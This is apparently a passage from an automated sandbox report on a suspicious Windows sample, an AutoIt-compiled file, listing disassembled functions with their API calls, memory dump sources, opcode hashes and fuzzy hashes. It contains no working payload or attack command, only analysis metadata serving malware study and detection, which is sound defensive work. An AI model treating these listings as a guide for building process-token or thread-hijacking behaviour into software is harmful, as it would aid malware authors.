                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 1687444384-0
                                                                                        • Opcode ID: fc2ac3f797ca74dc64444b86a8cd4f5eefb4a10bf1cd631e93ef915488577e29
                                                                                        • Instruction ID: b7de26ccfb1ac1b5f072b14f941167eb0d1cdbf640fc2f036607af2ed4f52c99
                                                                                        • Opcode Fuzzy Hash: fc2ac3f797ca74dc64444b86a8cd4f5eefb4a10bf1cd631e93ef915488577e29
                                                                                        • Instruction Fuzzy Hash: D2015E719047409EE720AF65C90574AB7E0AF80325F20894EE499962E1CB74A640FB41
                                                                                        Function 00F4E32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F4E33D
                                                                                        • _memset.LIBCMT ref: 00F4E34C
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00FA3D00,00FA3D44), ref: 00F4E37B
                                                                                        • CloseHandle.KERNEL32 ref: 00F4E38D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3277943733-0
                                                                                        • Opcode ID: 57fd3040a004bd7d6e19ede84576bff609e848587a2b97225f3feb124f867695
                                                                                        • Instruction ID: 13b6cfcd3ccacb0d2905cab6503ea8e487097ee8bafa549f3a3be7f8d62fb806
                                                                                        • Opcode Fuzzy Hash: 57fd3040a004bd7d6e19ede84576bff609e848587a2b97225f3feb124f867695
                                                                                        • Instruction Fuzzy Hash: 5FF05EF164030CFAE7101B60AC46F77BE5CDB06B54F014421FE0AD61A2D7759E00B6B8
                                                                                        Function 00F4EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EFAFE3
                                                                                          • Part of subcall function 00EFAF83: SelectObject.GDI32(?,00000000), ref: 00EFAFF2
                                                                                          • Part of subcall function 00EFAF83: BeginPath.GDI32(?), ref: 00EFB009
                                                                                          • Part of subcall function 00EFAF83: SelectObject.GDI32(?,00000000), ref: 00EFB033
                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F4EA8E
                                                                                        • LineTo.GDI32(00000000,?,?), ref: 00F4EA9B
                                                                                        • EndPath.GDI32(00000000), ref: 00F4EAAB
                                                                                        • StrokePath.GDI32(00000000), ref: 00F4EAB9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                        • String ID:
                                                                                        • API String ID: 1539411459-0
                                                                                        • Opcode ID: e4f62f235313724743fbafbd9ee5f1eb4a93e283420fe9b7ca7eed4f2a28d699
                                                                                        • Instruction ID: 2b57885635d674216e09f686382ba343d28ebcfdda9e630dc30d976c921fbdfd
                                                                                        • Opcode Fuzzy Hash: e4f62f235313724743fbafbd9ee5f1eb4a93e283420fe9b7ca7eed4f2a28d699
                                                                                        • Instruction Fuzzy Hash: 39F0BE3250525CBBDB129F94AC09FCA3F19AF0A320F084201FE21650E1C3B85611EB95
                                                                                        Function 00F1C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00F1C84A
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F1C85D
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F1C864
                                                                                        • AttachThreadInput.USER32(00000000), ref: 00F1C86B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2710830443-0
                                                                                        • Opcode ID: 8e923e2f6e992eedf450557c1258887662c0892f732c76fd2ef9f14909c1921d
                                                                                        • Instruction ID: c2a76afdf18324d0bf4db3f8124107e72e55ad1a77ff308303764a1dc466fd91
                                                                                        • Opcode Fuzzy Hash: 8e923e2f6e992eedf450557c1258887662c0892f732c76fd2ef9f14909c1921d
                                                                                        • Instruction Fuzzy Hash: 88E03971A81228BAEB201BA2DC4DEDB7F1CEF067B1F008021F61984460C6B28580EBE0
                                                                                        Function 00F1B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentThread.KERNEL32 ref: 00F1B0D6
                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F1AC9D), ref: 00F1B0DD
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F1AC9D), ref: 00F1B0EA
                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F1AC9D), ref: 00F1B0F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                        • String ID:
                                                                                        • API String ID: 3974789173-0
                                                                                        • Opcode ID: 315da61e720cc6bd80fa3d08cc1e115be81e5c730aa5f7dd598628bd107c3283
                                                                                        • Instruction ID: 6e305a75356bb38c96e0d3b9227ce199f836968447f985b11b3c2c209c9e80f4
                                                                                        • Opcode Fuzzy Hash: 315da61e720cc6bd80fa3d08cc1e115be81e5c730aa5f7dd598628bd107c3283
                                                                                        • Instruction Fuzzy Hash: 4FE08632F01216EBD7201FB25C0DB873BA8EF597A2F018818F261D6040DBB48441E760
                                                                                        Function 00EFB47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 00EFB496
                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00EFB4A0
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00EFB4B5
                                                                                        • GetStockObject.GDI32(00000005), ref: 00EFB4BD
                                                                                        • GetWindowDC.USER32(?,00000000), ref: 00F5DE2B
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F5DE38
                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00F5DE51
                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00F5DE6A
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00F5DE8A
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00F5DE95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1946975507-0
                                                                                        • Opcode ID: 010ae5055badd8f1473f8c13e8460c6b64b0afd31d854c1a4bf0a0299d722b4c
                                                                                        • Instruction ID: b4cb06fdfad0df2ceeb6e65039e38081ec6287fe3a6335bab8ae3742d77fea42
                                                                                        • Opcode Fuzzy Hash: 010ae5055badd8f1473f8c13e8460c6b64b0afd31d854c1a4bf0a0299d722b4c
                                                                                        • Instruction Fuzzy Hash: 9EE0E531A00244ABEF215B64EC0DBD83B119B52336F14C666FB75580E1C7F14585EB11
                                                                                        Function 00F1B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F1B2DF
                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00F1B2EB
                                                                                        • CloseHandle.KERNEL32(?), ref: 00F1B2F4
                                                                                        • CloseHandle.KERNEL32(?), ref: 00F1B2FC
                                                                                          • Part of subcall function 00F1AB24: GetProcessHeap.KERNEL32(00000000,?,00F1A848), ref: 00F1AB2B
                                                                                          • Part of subcall function 00F1AB24: HeapFree.KERNEL32(00000000), ref: 00F1AB32
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                        • String ID:
                                                                                        • API String ID: 146765662-0
                                                                                        • Opcode ID: efac6a33b7a546aca6de6070de840c59702a6f8e3f09013a9af8f4be40972743
                                                                                        • Instruction ID: d688c21fcc8206ed25cb5b0201997c567f5f703c316ae60c9854fe5fbd136174
                                                                                        • Opcode Fuzzy Hash: efac6a33b7a546aca6de6070de840c59702a6f8e3f09013a9af8f4be40972743
                                                                                        • Instruction Fuzzy Hash: 3DE0EC3A604009BFCB016FA5EC09859FFB6FF883213108222F63581675CB76A871FB91
                                                                                        Function 00F5B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: 5d0013dc9a1cd14ef31d6ebd37b1e6b32b0cfb223f92bfa25021d28484c9c074
                                                                                        • Instruction ID: 558853368621790c4ea6f9e338c52e08d5e0b5e3e1e241edcff90d2c2edcb931
                                                                                        • Opcode Fuzzy Hash: 5d0013dc9a1cd14ef31d6ebd37b1e6b32b0cfb223f92bfa25021d28484c9c074
                                                                                        • Instruction Fuzzy Hash: 80E04FB1A00208EFDB015F70CC4C66D7BA9EB4C351F11C809FE6A97250DBF59840AF50
                                                                                        Function 00F5B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: 68fcf71a25c2aeb06a87c60ecb05f21d2cbe49c9abe39d0bfb47bf852a659785
                                                                                        • Instruction ID: 2ffcd7b40ac0bf3e6a2918f153f261f2d8033db74d840ead7b9321b22361d6e3
                                                                                        • Opcode Fuzzy Hash: 68fcf71a25c2aeb06a87c60ecb05f21d2cbe49c9abe39d0bfb47bf852a659785
                                                                                        • Instruction Fuzzy Hash: 31E04FB1A00208EFDB005F70CC4856D7BA9EB4C350F118409FA6A97250DBF59800AB10
                                                                                        Function 00F1DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00F1DEAA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContainedObject
                                                                                        • String ID: AutoIt3GUI$Container
                                                                                        • API String ID: 3565006973-3941886329
                                                                                        • Opcode ID: 7465b852ec7d4433464e03e083956027167e1d42359c2439be4c4fc46f40e3b1
                                                                                        • Instruction ID: 54f903f2833ce215e874f92e4a63ea3989036796b61a489f4a0f7286820837bb
                                                                                        • Opcode Fuzzy Hash: 7465b852ec7d4433464e03e083956027167e1d42359c2439be4c4fc46f40e3b1
                                                                                        • Instruction Fuzzy Hash: D0914770600701AFDB54DF64C884BAABBF9BF48710F10856DF94ACB291DB71E981DB60
                                                                                        Function 00F2DE7C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFC6F4: _wcscpy.LIBCMT ref: 00EFC717
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                        • __wcsnicmp.LIBCMT ref: 00F2DEFD
                                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F2DFC6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                        • String ID: LPT
                                                                                        • API String ID: 3222508074-1350329615
                                                                                        • Opcode ID: 54f9497f96c3c47d068433a730a5d6aff7f07716c62629e1ab555f45bba78b50
                                                                                        • Instruction ID: 2e9cca56e39aeda32231e977b2db2abdd236e93c80b94d3c2fda6eaaf7c842ce
                                                                                        • Opcode Fuzzy Hash: 54f9497f96c3c47d068433a730a5d6aff7f07716c62629e1ab555f45bba78b50
                                                                                        • Instruction Fuzzy Hash: 3461D176E00228AFCB14DF98D981EAEB7F4FF08310F11405AF506AB291D770AE41DB90
                                                                                        Function 00EFBCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000), ref: 00EFBCDA
                                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00EFBCF3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                        • String ID: @
                                                                                        • API String ID: 2783356886-2766056989
                                                                                        • Opcode ID: b9c9e9e4b4f153bd30b8fd8d1cd98b0d73123c5117ae7efb102d5d596df61a84
                                                                                        • Instruction ID: 61bc33384cb84977b2c647a41e14b10e8a98d542842e5b42de5f49e7dc41abfa
                                                                                        • Opcode Fuzzy Hash: b9c9e9e4b4f153bd30b8fd8d1cd98b0d73123c5117ae7efb102d5d596df61a84
                                                                                        • Instruction Fuzzy Hash: 0D513471408748ABE321AF14DC86BAFBBE8FFD4354F41484EF2C8520A2DF7185A89756
                                                                                        Function 00F2C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EE44ED: __fread_nolock.LIBCMT ref: 00EE450B
                                                                                        • _wcscmp.LIBCMT ref: 00F2C65D
                                                                                        • _wcscmp.LIBCMT ref: 00F2C670
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                        • String ID: FILE
                                                                                        • API String ID: 4029003684-3121273764
                                                                                        • Opcode ID: 7cf0138d291e9e91d6637b713e7c77af80d783d10bfe6391e7e6f47bfff170eb
                                                                                        • Instruction ID: d95655b1d0df2b19ad845bf966ec49b109f6995925165decc3cb750009074f24
                                                                                        • Opcode Fuzzy Hash: 7cf0138d291e9e91d6637b713e7c77af80d783d10bfe6391e7e6f47bfff170eb
                                                                                        • Instruction Fuzzy Hash: A341D572A0025ABADF20ABE49C41FEF7BF9AF49714F001069F615FB1C1D7749A049B91
                                                                                        Function 00F4A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00F4A85A
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F4A86F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: '
                                                                                        • API String ID: 3850602802-1997036262
                                                                                        • Opcode ID: 979eef88003fd4aa83b5f053af9976232c0dc6458c39896d6284442548f0e39f
                                                                                        • Instruction ID: 0fe1861ed52d748e55de7cceddfbaf0c449e681fa57c5e8ad44a1964e33ac82a
                                                                                        • Opcode Fuzzy Hash: 979eef88003fd4aa83b5f053af9976232c0dc6458c39896d6284442548f0e39f
                                                                                        • Instruction Fuzzy Hash: 83410675E402099FDB14CF68C880BDA7BB9FB09310F14016AED05EB381D771A942DFA1
                                                                                        Function 00F35180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F35190
                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00F351C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CrackInternet_memset
                                                                                        • String ID: |
                                                                                        • API String ID: 1413715105-2343686810
                                                                                        • Opcode ID: 7add810ab6ba32d516f7398d77524c48ea9abad60ad0904b8a9562f440b6eec1
                                                                                        • Instruction ID: e2b52c3823661f93b11aa7ae35c54d1e52722b1c3b3ec31a937357d0887cd8e0
                                                                                        • Opcode Fuzzy Hash: 7add810ab6ba32d516f7398d77524c48ea9abad60ad0904b8a9562f440b6eec1
                                                                                        • Instruction Fuzzy Hash: 00310971C00119ABCF01AFA5CC85AEE7FB9FF58750F100055E915B6166DB31AA46DBA0
                                                                                        Function 00F4975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00F4980E
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F4984A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
